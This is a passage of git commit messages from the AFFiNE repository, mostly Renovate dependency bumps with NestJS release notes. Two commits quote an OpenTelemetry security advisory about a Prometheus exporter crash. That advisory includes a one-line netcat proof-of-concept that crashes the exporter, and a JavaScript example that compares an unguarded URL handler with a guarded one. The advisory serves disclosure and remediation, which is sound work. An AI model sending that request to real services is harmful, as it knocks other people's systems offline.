- Burhan Haroon ([@burhanharoon](https://redirect.github.com/burhanharoon))
- Kamil Mysliwiec ([@kamilmysliwiec](https://redirect.github.com/kamilmysliwiec))

</details>

<details>
<summary>nestjs/schedule (@nestjs/schedule)</summary>

###
[`v6.1.3`](https://redirect.github.com/nestjs/schedule/releases/tag/6.1.3)

[Compare
Source](https://redirect.github.com/nestjs/schedule/compare/6.1.2...6.1.3)

#### What's Changed

- feat(cron): add initialDelay option to defer first job execution by
[@&#8203;kyungseopk1m](https://redirect.github.com/kyungseopk1m) in
[#&#8203;2251](https://redirect.github.com/nestjs/schedule/pull/2251)

**Full Changelog**:
<https://github.com/nestjs/schedule/compare/6.1.2...6.1.3>

###
[`v6.1.2`](https://redirect.github.com/nestjs/schedule/releases/tag/6.1.2)

[Compare
Source](https://redirect.github.com/nestjs/schedule/compare/6.1.1...6.1.2)

- Merge pull request
[#&#8203;2247](https://redirect.github.com/nestjs/schedule/issues/2247)
from kyungseopk1m/feat/cron-initial-delay
([`a57ce2c`](https://redirect.github.com/nestjs/schedule/commit/a57ce2c))
- chore(deps): update dependency prettier to v3.8.3
([#&#8203;2248](https://redirect.github.com/nestjs/schedule/issues/2248))
([`bb3490d`](https://redirect.github.com/nestjs/schedule/commit/bb3490d))
- feat(cron): add initialDelay option to defer first job execution
([`1c5677f`](https://redirect.github.com/nestjs/schedule/commit/1c5677f))
- Merge pull request
[#&#8203;2245](https://redirect.github.com/nestjs/schedule/issues/2245)
from nestjs/renovate/nest-monorepo
([`59046bd`](https://redirect.github.com/nestjs/schedule/commit/59046bd))
- Merge pull request
[#&#8203;2246](https://redirect.github.com/nestjs/schedule/issues/2246)
from nestjs/renovate/oxlint-monorepo
([`be4eee3`](https://redirect.github.com/nestjs/schedule/commit/be4eee3))
- chore(deps): update dependency oxlint to v1.60.0
([`32a9ce2`](https://redirect.github.com/nestjs/schedule/commit/32a9ce2))
- chore(deps): update nest monorepo to v11.1.19
([`7d3844f`](https://redirect.github.com/nestjs/schedule/commit/7d3844f))
- chore: migrate to oxlint, vitest, ts6
([`29de71b`](https://redirect.github.com/nestjs/schedule/commit/29de71b))
- chore(deps): update dependency globals to v17.5.0
([#&#8203;2244](https://redirect.github.com/nestjs/schedule/issues/2244))
([`6c62cca`](https://redirect.github.com/nestjs/schedule/commit/6c62cca))
- chore(deps): update dependency sinon to v21.1.2
([#&#8203;2243](https://redirect.github.com/nestjs/schedule/issues/2243))
([`ee3b31a`](https://redirect.github.com/nestjs/schedule/commit/ee3b31a))
- chore(deps): update dependency sinon to v21.1.1
([#&#8203;2241](https://redirect.github.com/nestjs/schedule/issues/2241))
([`eba9799`](https://redirect.github.com/nestjs/schedule/commit/eba9799))
- Merge pull request
[#&#8203;2242](https://redirect.github.com/nestjs/schedule/issues/2242)
from nestjs/renovate/prettier-3.x
([`c3ad0f7`](https://redirect.github.com/nestjs/schedule/commit/c3ad0f7))
- chore(deps): update dependency prettier to v3.8.2
([`798e2a9`](https://redirect.github.com/nestjs/schedule/commit/798e2a9))
- Merge pull request
[#&#8203;2199](https://redirect.github.com/nestjs/schedule/issues/2199)
from nestjs/renovate/cimg-node-24.x
([`a05354a`](https://redirect.github.com/nestjs/schedule/commit/a05354a))
- chore(deps): update dependency typescript-eslint to v8.58.1
([#&#8203;2240](https://redirect.github.com/nestjs/schedule/issues/2240))
([`0367ac1`](https://redirect.github.com/nestjs/schedule/commit/0367ac1))
- chore(deps): update dependency eslint to v10.2.0
([#&#8203;2239](https://redirect.github.com/nestjs/schedule/issues/2239))
([`fa93e06`](https://redirect.github.com/nestjs/schedule/commit/fa93e06))
- chore(deps): update nest monorepo to v11.1.18
([#&#8203;2238](https://redirect.github.com/nestjs/schedule/issues/2238))
([`8cd4c02`](https://redirect.github.com/nestjs/schedule/commit/8cd4c02))
- chore(deps): update dependency @types/node to v24.12.2
([#2237](https://redirect.github.com/nestjs/schedule/issues/2237))
([`01482df`](https://redirect.github.com/nestjs/schedule/commit/01482df))
- chore(deps): update dependency @types/sinon to v21.0.1
([#2236](https://redirect.github.com/nestjs/schedule/issues/2236))
([`f05b5bd`](https://redirect.github.com/nestjs/schedule/commit/f05b5bd))
- chore(deps): update dependency ts-jest to v29.4.9
([#&#8203;2235](https://redirect.github.com/nestjs/schedule/issues/2235))
([`af545e6`](https://redirect.github.com/nestjs/schedule/commit/af545e6))
- chore(deps): update dependency typescript-eslint to v8.58.0
([#&#8203;2233](https://redirect.github.com/nestjs/schedule/issues/2233))
([`4dad22a`](https://redirect.github.com/nestjs/schedule/commit/4dad22a))
- chore(deps): update node.js to v24.14.1
([`28db9bc`](https://redirect.github.com/nestjs/schedule/commit/28db9bc))
- chore(deps): update dependency eslint to v10.1.0
([#&#8203;2232](https://redirect.github.com/nestjs/schedule/issues/2232))
([`413f390`](https://redirect.github.com/nestjs/schedule/commit/413f390))
- chore(deps): update nest monorepo to v11.1.17
([#&#8203;2230](https://redirect.github.com/nestjs/schedule/issues/2230))
([`46c2bc5`](https://redirect.github.com/nestjs/schedule/commit/46c2bc5))
- chore(deps): update dependency typescript-eslint to v8.57.1
([#&#8203;2231](https://redirect.github.com/nestjs/schedule/issues/2231))
([`8fd063b`](https://redirect.github.com/nestjs/schedule/commit/8fd063b))
- chore(deps): update dependency sinon to v21.0.3
([#&#8203;2229](https://redirect.github.com/nestjs/schedule/issues/2229))
([`1671ad9`](https://redirect.github.com/nestjs/schedule/commit/1671ad9))
- chore(deps): update commitlint monorepo to v20.5.0
([#&#8203;2228](https://redirect.github.com/nestjs/schedule/issues/2228))
([`2ecd2f1`](https://redirect.github.com/nestjs/schedule/commit/2ecd2f1))
- chore(deps): update dependency lint-staged to v16.4.0
([#&#8203;2227](https://redirect.github.com/nestjs/schedule/issues/2227))
([`aa0de01`](https://redirect.github.com/nestjs/schedule/commit/aa0de01))
- chore(deps): update commitlint monorepo to v20.4.4
([#&#8203;2226](https://redirect.github.com/nestjs/schedule/issues/2226))
([`75034fe`](https://redirect.github.com/nestjs/schedule/commit/75034fe))
- chore(deps): update dependency lint-staged to v16.3.3
([#&#8203;2225](https://redirect.github.com/nestjs/schedule/issues/2225))
([`f1c7d31`](https://redirect.github.com/nestjs/schedule/commit/f1c7d31))
- chore(deps): update dependency jest to v30.3.0
([#&#8203;2224](https://redirect.github.com/nestjs/schedule/issues/2224))
([`1a208d4`](https://redirect.github.com/nestjs/schedule/commit/1a208d4))
- chore(deps): update dependency typescript-eslint to v8.57.0
([#&#8203;2223](https://redirect.github.com/nestjs/schedule/issues/2223))
([`60dd2c9`](https://redirect.github.com/nestjs/schedule/commit/60dd2c9))
- chore(deps): update dependency eslint to v10.0.3
([#&#8203;2221](https://redirect.github.com/nestjs/schedule/issues/2221))
([`791b6ba`](https://redirect.github.com/nestjs/schedule/commit/791b6ba))
- chore(deps): update dependency @eslint/eslintrc to v3.3.5
([#2220](https://redirect.github.com/nestjs/schedule/issues/2220))
([`0da1ca7`](https://redirect.github.com/nestjs/schedule/commit/0da1ca7))
- chore(deps): update dependency @types/node to v24.12.0
([#2219](https://redirect.github.com/nestjs/schedule/issues/2219))
([`934a93e`](https://redirect.github.com/nestjs/schedule/commit/934a93e))
- chore(deps): update nest monorepo to v11.1.16
([#&#8203;2218](https://redirect.github.com/nestjs/schedule/issues/2218))
([`5f44e9b`](https://redirect.github.com/nestjs/schedule/commit/5f44e9b))
- chore(deps): update dependency sinon to v21.0.2
([#&#8203;2217](https://redirect.github.com/nestjs/schedule/issues/2217))
([`b807746`](https://redirect.github.com/nestjs/schedule/commit/b807746))
- chore(deps): update dependency lint-staged to v16.3.2
([#&#8203;2216](https://redirect.github.com/nestjs/schedule/issues/2216))
([`4ca32bd`](https://redirect.github.com/nestjs/schedule/commit/4ca32bd))
- chore(deps): update commitlint monorepo to v20.4.3
([#&#8203;2215](https://redirect.github.com/nestjs/schedule/issues/2215))
([`d3ceb76`](https://redirect.github.com/nestjs/schedule/commit/d3ceb76))
- chore(deps): update nest monorepo to v11.1.15
([#&#8203;2214](https://redirect.github.com/nestjs/schedule/issues/2214))
([`b084ffc`](https://redirect.github.com/nestjs/schedule/commit/b084ffc))
- chore(deps): update dependency lint-staged to v16.3.1
([#&#8203;2213](https://redirect.github.com/nestjs/schedule/issues/2213))
([`8a201b2`](https://redirect.github.com/nestjs/schedule/commit/8a201b2))
- chore(deps): update dependency globals to v17.4.0
([#&#8203;2212](https://redirect.github.com/nestjs/schedule/issues/2212))
([`6f61793`](https://redirect.github.com/nestjs/schedule/commit/6f61793))
- chore(deps): update dependency lint-staged to v16.3.0
([#&#8203;2211](https://redirect.github.com/nestjs/schedule/issues/2211))
([`aa9213a`](https://redirect.github.com/nestjs/schedule/commit/aa9213a))
- chore(deps): update dependency @types/node to v24.11.0
([#2210](https://redirect.github.com/nestjs/schedule/issues/2210))
([`c70b928`](https://redirect.github.com/nestjs/schedule/commit/c70b928))
- chore(deps): update dependency @types/node to v24.10.15
([#2209](https://redirect.github.com/nestjs/schedule/issues/2209))
([`0f596b9`](https://redirect.github.com/nestjs/schedule/commit/0f596b9))
- chore(deps): update dependency @types/node to v24.10.14
([#2208](https://redirect.github.com/nestjs/schedule/issues/2208))
([`dac8cca`](https://redirect.github.com/nestjs/schedule/commit/dac8cca))
- chore(deps): update dependency eslint to v10.0.2
([#&#8203;2207](https://redirect.github.com/nestjs/schedule/issues/2207))
([`abe6fce`](https://redirect.github.com/nestjs/schedule/commit/abe6fce))
- chore(deps): update dependency @eslint/eslintrc to v3.3.4
([#2206](https://redirect.github.com/nestjs/schedule/issues/2206))
([`cb32a40`](https://redirect.github.com/nestjs/schedule/commit/cb32a40))
- chore(deps): update dependency typescript-eslint to v8.56.1
([#&#8203;2205](https://redirect.github.com/nestjs/schedule/issues/2205))
([`88e1e6c`](https://redirect.github.com/nestjs/schedule/commit/88e1e6c))
- chore(deps): update dependency eslint to v10.0.1
([#&#8203;2204](https://redirect.github.com/nestjs/schedule/issues/2204))
([`55e5406`](https://redirect.github.com/nestjs/schedule/commit/55e5406))
- chore(deps): update commitlint monorepo to v20.4.2
([#&#8203;2203](https://redirect.github.com/nestjs/schedule/issues/2203))
([`4e55d62`](https://redirect.github.com/nestjs/schedule/commit/4e55d62))
- chore(deps): update nest monorepo to v11.1.14
([#&#8203;2202](https://redirect.github.com/nestjs/schedule/issues/2202))
([`d23ea1a`](https://redirect.github.com/nestjs/schedule/commit/d23ea1a))
- chore(deps): update eslint monorepo to v10
([#&#8203;2195](https://redirect.github.com/nestjs/schedule/issues/2195))
([`c2fcbc3`](https://redirect.github.com/nestjs/schedule/commit/c2fcbc3))
- chore(deps): update dependency typescript-eslint to v8.56.0
([#&#8203;2201](https://redirect.github.com/nestjs/schedule/issues/2201))
([`a93ebc4`](https://redirect.github.com/nestjs/schedule/commit/a93ebc4))
- chore(deps): update dependency rimraf to v6.1.3
([#&#8203;2200](https://redirect.github.com/nestjs/schedule/issues/2200))
([`1906e80`](https://redirect.github.com/nestjs/schedule/commit/1906e80))
- chore(deps): update dependency @types/node to v24.10.13
([#2198](https://redirect.github.com/nestjs/schedule/issues/2198))
([`244cb84`](https://redirect.github.com/nestjs/schedule/commit/244cb84))
- chore(deps): update dependency typescript-eslint to v8.55.0
([#&#8203;2197](https://redirect.github.com/nestjs/schedule/issues/2197))
([`6b00083`](https://redirect.github.com/nestjs/schedule/commit/6b00083))
- chore(deps): update dependency @types/node to v24.10.12
([#2196](https://redirect.github.com/nestjs/schedule/issues/2196))
([`b310c95`](https://redirect.github.com/nestjs/schedule/commit/b310c95))
- chore(deps): update dependency @types/node to v24.10.11
([#2194](https://redirect.github.com/nestjs/schedule/issues/2194))
([`d05dca5`](https://redirect.github.com/nestjs/schedule/commit/d05dca5))

</details>

<details>
<summary>nestjs/swagger (@nestjs/swagger)</summary>

###
[`v11.4.2`](https://redirect.github.com/nestjs/swagger/compare/11.4.1...b0a35f3b20bedc6e6756f476cee182700a199b6e)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.1...11.4.2)

###
[`v11.4.1`](https://redirect.github.com/nestjs/swagger/compare/11.4.0...14bd8f58d6011a1be03e266e39e472be0d4d3795)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.4.0...11.4.1)

###
[`v11.4.0`](https://redirect.github.com/nestjs/swagger/releases/tag/11.4.0)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.2...11.4.0)

#### 11.4.0 (2026-04-22)

##### Features

- [#3868](https://redirect.github.com/nestjs/swagger/pull/3868)
feat(plugin): auto-mark optional @Query parameters as required: false
([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3725](https://redirect.github.com/nestjs/swagger/pull/3725)
feat(swagger): add OpenAPI 3.2 hierarchical tags support
([@&#8203;apt-bh](https://redirect.github.com/apt-bh))

##### Bug fixes

- [#&#8203;3874](https://redirect.github.com/nestjs/swagger/pull/3874)
fix(document-builder): accept multi-digit OpenAPI version segments
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#3873](https://redirect.github.com/nestjs/swagger/pull/3873)
fix(plugin): strip regex delimiters and flags from @Matches patterns
([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#3870](https://redirect.github.com/nestjs/swagger/pull/3870)
fix(decorators): forward all OpenAPI parameter fields in @ApiHeader
([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#3872](https://redirect.github.com/nestjs/swagger/pull/3872)
fix(plugin): emit @throws descriptions as proper string literals
([@yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [#&#8203;3782](https://redirect.github.com/nestjs/swagger/pull/3782)
fix(schema): preserve example metadata for non-body params with named
types ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3761](https://redirect.github.com/nestjs/swagger/pull/3761)
fix(plugin): support boolean literal types and boolean enum values
([@&#8203;lucreiss](https://redirect.github.com/lucreiss))

##### Enhancements

- [#&#8203;3865](https://redirect.github.com/nestjs/swagger/pull/3865)
feat(schema-object-factory): include class name chain in circular
dependency errors
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))

##### Committers: 4

- Lu R A ([@&#8203;lucreiss](https://redirect.github.com/lucreiss))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Yogeshwaran C
([@&#8203;yogeshwaran-c](https://redirect.github.com/yogeshwaran-c))
- [@&#8203;apt-bh](https://redirect.github.com/apt-bh)

###
[`v11.3.2`](https://redirect.github.com/nestjs/swagger/compare/11.3.1...b16a1e19a8b7161e13c01c636acf3a187eabbd06)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.1...11.3.2)

###
[`v11.3.1`](https://redirect.github.com/nestjs/swagger/compare/11.3.0...93744af0bb923daeebcc2b674bc7957d778d3953)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.3.0...11.3.1)

###
[`v11.3.0`](https://redirect.github.com/nestjs/swagger/releases/tag/11.3.0)

[Compare
Source](https://redirect.github.com/nestjs/swagger/compare/11.2.7...11.3.0)

#### 11.3.0 (2026-04-15)

##### Bug fixes

- [#3826](https://redirect.github.com/nestjs/swagger/pull/3826)
fix: support nullable field in @ApiResponse decorator
([@Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3784](https://redirect.github.com/nestjs/swagger/pull/3784)
fix(schema): include type field when nullable is used with allOf
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3774](https://redirect.github.com/nestjs/swagger/pull/3774)
fix enum issue
([@&#8203;SupunGeethanjana](https://redirect.github.com/SupunGeethanjana))
- [#&#8203;3798](https://redirect.github.com/nestjs/swagger/pull/3798)
fix(plugin): normalize workspace package import paths in metadata
generator ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3821](https://redirect.github.com/nestjs/swagger/pull/3821)
fix(plugin): handle same-file type references in SWC readonly metadata
generation ([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#&#8203;3822](https://redirect.github.com/nestjs/swagger/pull/3822)
fix(type-helpers): eagerly apply plugin metadata properties in mapped
type helpers
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- [#3840](https://redirect.github.com/nestjs/swagger/pull/3840)
fix: use child class type when re-declaring an inherited @ApiProperty
([@Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))

##### Enhancements

- [#&#8203;3449](https://redirect.github.com/nestjs/swagger/pull/3449)
feat(api-header): add example property to ApiHeader decorator
([@&#8203;leemhoon00](https://redirect.github.com/leemhoon00))
- [#3787](https://redirect.github.com/nestjs/swagger/pull/3787)
feat(decorators): support RegExp instances in @ApiProperty({ pattern })
([@temrjan](https://redirect.github.com/temrjan))
- [#&#8203;3699](https://redirect.github.com/nestjs/swagger/pull/3699)
feat(api-body): add support for encoding in ApiBody decorator
([@&#8203;lamuertepeluda](https://redirect.github.com/lamuertepeluda))
- [#&#8203;3824](https://redirect.github.com/nestjs/swagger/pull/3824)
feat: support async patchDocumentOnRequest hook
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3834](https://redirect.github.com/nestjs/swagger/pull/3834)
feat: expose generateSchema utility for programmatic schema access
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3836](https://redirect.github.com/nestjs/swagger/pull/3836)
feat(plugin): add autoFillEnumName option to suppress duplicate enum
schemas
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3837](https://redirect.github.com/nestjs/swagger/pull/3837)
feat: merge descriptions when multiple decorators share the same HTTP
status code
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3839](https://redirect.github.com/nestjs/swagger/pull/3839)
feat: add excludeDynamicDefaults option to strip runtime-evaluated
schema defaults
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))
- [#&#8203;3841](https://redirect.github.com/nestjs/swagger/pull/3841)
feat: add DeepPartialType mapped-type helper for recursive optional
properties
([@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M))

##### Dependencies

- [#&#8203;3850](https://redirect.github.com/nestjs/swagger/pull/3850)
fix(deps): update dependency swagger-ui-dist to v5.32.4
([@&#8203;renovate\[bot\]](https://redirect.github.com/apps/renovate))

##### Committers: 7

- JongHun Lim
([@&#8203;leemhoon00](https://redirect.github.com/leemhoon00))
- Maruthan G
([@&#8203;maruthang](https://redirect.github.com/maruthang))
- Rajasekar Janakiraman
([@&#8203;rajasekar33](https://redirect.github.com/rajasekar33))
- Supun Geethanjana Jayasinghe
([@&#8203;SupunGeethanjana](https://redirect.github.com/SupunGeethanjana))
- Temrjan ([@&#8203;temrjan](https://redirect.github.com/temrjan))
- Vito Macchia
([@&#8203;lamuertepeluda](https://redirect.github.com/lamuertepeluda))
-
[@&#8203;Nedunchezhiyan-M](https://redirect.github.com/Nedunchezhiyan-M)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-14 01:25:23 +08:00
DarkSky 659072183c chore: bump deps 2026-05-13 22:26:02 +08:00
renovate[bot] f19a922793 chore: bump up @opentelemetry/sdk-node version to ^0.217.0 [SECURITY] (#14945)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.215.0` →
`^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.215.0/0.217.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.217.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.215.0/0.217.0?slim=true)
|

---

### Prometheus exporter process crash via malformed HTTP request
[CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) /
[GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

<details>
<summary>More information</summary>

#### Details
##### Summary

A single malformed HTTP request crashes any Node.js process running the
OpenTelemetry JS Prometheus exporter. The metrics endpoint (default
`0.0.0.0:9464`) has no error handling around URL parsing, so a request
with an invalid URI causes an uncaught `TypeError` that terminates the
process.

**You are affected by this vulnerability if either of the following
apply to your application:**

* you directly use `@opentelemetry/exporter-prometheus` in your code
through its built-in server.
* your `OTEL_METRICS_EXPORTER` environment variable includes
`prometheus` **AND**
  * you use `@opentelemetry/sdk-node`
  * you use `@opentelemetry/auto-instrumentations-node` via `--require @opentelemetry/auto-instrumentations-node/register`/`--import @opentelemetry/auto-instrumentations-node/register`

##### Impact

**Denial of service.** Any application using the OpenTelemetry
Prometheus exporter’s built-in server can be crashed by a single
unauthenticated network packet sent to the metrics port. No
authentication, special privileges, or prior access is required.

##### Remediation

##### Update to the fixed version

Update `@opentelemetry/exporter-prometheus` and
`@opentelemetry/sdk-node` to version **0.217.0** or later.
Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0**
or later.

This release adds proper error handling around the URL constructor,
returning an HTTP `400` response on parse failure rather than allowing
the exception to propagate and crash the process.

```
npm install @opentelemetry/exporter-prometheus@latest
```

##### Do Not Expose the Endpoint to Untrusted Users

> [!IMPORTANT] 
> The following mitigations reduce exposure but do not fully remediate
the vulnerability. Any client that *can* reach the metrics endpoint -
including your own Prometheus scraper host if compromised - could still
trigger the crash. Updating to **0.217.0** is the recommended
resolution.

If updating is not immediately feasible, restrict access to the metrics
endpoint so that it is not reachable by untrusted or unauthenticated
network clients. For example:

* **Bind to localhost only** by setting the `host` option to `127.0.0.1`
when configuring the `PrometheusExporter`, so the port is not exposed on
public or shared network interfaces

* **Use a firewall or network policy** to restrict access to port `9464`
(or whichever port you have configured) to only trusted Prometheus
scrape hosts

* **Place the endpoint behind a reverse proxy** that filters or
validates incoming requests before they reach the exporter

##### Details

In `PrometheusExporter.ts`, the `_requestHandler` calls `new
URL(request.url, this._baseUrl)` without any error handling. Node's HTTP
parser accepts absolute-form URIs (e.g. `http://`) for proxy
compatibility, including malformed ones. When `request.url` is
`"http://"`, the `URL` constructor throws `TypeError: Invalid URL`.
Since there is no try-catch in the handler, the exception propagates as
an uncaught exception and crashes the process.

The Prometheus metrics endpoint is unauthenticated by design (Prometheus
scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable
by any network client that can connect to the metrics port.

##### Proof of Concept

Start any Node.js application with the Prometheus exporter running on
the default port `9464`, then send a single raw TCP packet:

```
echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464
```

The process crashes immediately with:

```
TypeError: Invalid URL
    at new URL (...)
    at PrometheusExporter._requestHandler (...)
```

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3)
-
[https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js (@opentelemetry/sdk-node)</summary>

###
[`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c)

###
[`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 18:55:30 +08:00
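
The advisory quoted in the commit above traces the crash to an unguarded `new URL(request.url, ...)` call in the request handler. The following JavaScript is an added example, not code from opentelemetry-js or from this repository: it puts that pattern beside a guarded handler that answers `400`. The handler names, `BASE_URL`, `METRICS_PATH` and the mock request/response objects are assumptions made for illustration, and the sample request targets are constructed.

```javascript
// Added illustration; all names below are hypothetical, not the exporter's own.
// Assumed base URL, mirroring the default metrics port named in the advisory.
const BASE_URL = 'http://localhost:9464/';
const METRICS_PATH = '/metrics';

// Shared helper: set a status and finish the response.
function respond(response, statusCode) {
  response.statusCode = statusCode;
  response.end();
}

// Pattern described in the advisory: the URL constructor is called on the raw
// request target with no error handling. For request.url === 'http://' it
// throws TypeError (Invalid URL). Inside a real http 'request' listener that
// throw is an uncaught exception and terminates the process.
function unguardedHandler(request, response) {
  const { pathname } = new URL(request.url, BASE_URL);
  respond(response, pathname === METRICS_PATH ? 200 : 404);
}

// Guarded form matching the fix the advisory describes: a parse failure is
// answered with HTTP 400 instead of being allowed to propagate.
function guardedHandler(request, response) {
  let pathname;
  try {
    pathname = new URL(request.url, BASE_URL).pathname;
  } catch (err) {
    respond(response, 400);
    return;
  }
  respond(response, pathname === METRICS_PATH ? 200 : 404);
}

// Minimal stand-in for http.ServerResponse so the example runs offline.
function mockResponse() {
  return {
    statusCode: null,
    ended: false,
    end() {
      this.ended = true;
    },
  };
}

// Drive one handler with one request target and report what happened.
// "threw" models the exception that would escape to the process level.
function run(handler, url) {
  const response = mockResponse();
  try {
    handler({ url }, response);
    return { threw: false, errorName: null, status: response.statusCode };
  } catch (err) {
    return { threw: true, errorName: err.name, status: response.statusCode };
  }
}

// Constructed sample request targets: a normal scrape, an unknown path, and
// the malformed absolute-form target quoted in the advisory.
const SAMPLE_TARGETS = ['/metrics', '/unknown', 'http://'];

// Compare both handlers across the samples.
function compareHandlers() {
  return SAMPLE_TARGETS.map((url) => ({
    url,
    unguarded: run(unguardedHandler, url),
    guarded: run(guardedHandler, url),
  }));
}

for (const row of compareHandlers()) {
  const describe = (r) => (r.threw ? `throws ${r.errorName}` : `HTTP ${r.status}`);
  console.log(`${JSON.stringify(row.url)}: unguarded ${describe(row.unguarded)}, guarded ${describe(row.guarded)}`);
}
```

A regression test for a patched deployment can assert the same property: the malformed target yields a `400` and the handler does not throw.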
renovate[bot] ac6d0d35af chore: bump up @opentelemetry/exporter-prometheus version to ^0.217.0 [SECURITY] (#14944)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus)
([source](https://redirect.github.com/open-telemetry/opentelemetry-js))
| [`^0.215.0` →
`^0.217.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.215.0/0.217.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.217.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.215.0/0.217.0?slim=true)
|

---

### Prometheus exporter process crash via malformed HTTP request
[CVE-2026-44902](https://nvd.nist.gov/vuln/detail/CVE-2026-44902) /
[GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3)

<details>
<summary>More information</summary>

#### Details
##### Summary

A single malformed HTTP request crashes any Node.js process running the
OpenTelemetry JS Prometheus exporter. The metrics endpoint (default
`0.0.0.0:9464`) has no error handling around URL parsing, so a request
with an invalid URI causes an uncaught `TypeError` that terminates the
process.

**You are affected by this vulnerability if either of the following
